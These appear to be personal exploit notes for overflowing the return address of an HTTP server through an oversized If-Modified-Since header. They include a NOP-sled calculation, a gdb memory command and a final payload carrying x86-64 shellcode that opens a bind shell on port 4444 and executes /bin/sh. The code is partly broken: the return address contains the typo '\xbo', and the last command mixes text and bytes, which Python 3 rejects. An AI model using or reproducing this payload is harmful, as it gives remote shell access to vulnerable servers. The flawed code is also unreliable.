
COMMAND TO OVERFLOW THE RETURN ADDRESS WITH "A"
python3 -c 'print("GET / HTTP/1.1\r\nIf-Modified-Since: " + "A"*1134 + "\r\n\r\n")' > payload


I've got 1134 bytes to use before fill the memory of which around 130 need to be used for the shellcode
1134 -132 = 1002 -> number of NOP


SEE THE MEMORY: x/200xb $rsp -1200


ADDRESS TO INSERT IN THE RETURN ADDRESS THROW THE OVERFLOW
\xb0\xf4\x5a\xf7\xff\x7f


python3 -c 'print("GET / HTTP/1.1\r\nIf-Modified-Since: " + b"\x90"*500 + b"
\x31\xc0\x31\xdb\x31\xd2\xb0\x01\x89\xc6\xfe\xc0\x89\xc7\xb2\x06\xb0\x29\x0f
\x05\x93\x48\x31\xc0\x50\x68\x02\x01\x11\x5c\x88\x44\x24\x01\x48\x89\xe6\xb2
\x10\x89\xdf\xb0\x31\x0f\x05\xb0\x05\x89\xc6\x89\xdf\xb0\x32\x0f\x05\x31\xd2
\x31\xf6\x89\xdf\xb0\x2b\x0f\x05\x89\xc7\x48\x31\xc0\x89\xc6\xb0\x21\x0f\x05
\xfe\xc0\x89\xc6\xb0\x21\x0f\x05\xfe\xc0\x89\xc6\xb0\x21\x0f\x05\x48\x31\xd2
\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48
\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x50\x5f\xb0\x3c\x0f\x05" + 
b"\x90"*501 + b"\xbo\xf4\x5a\xf7\xff\x7f" + "\r\n\r\n")' > payload
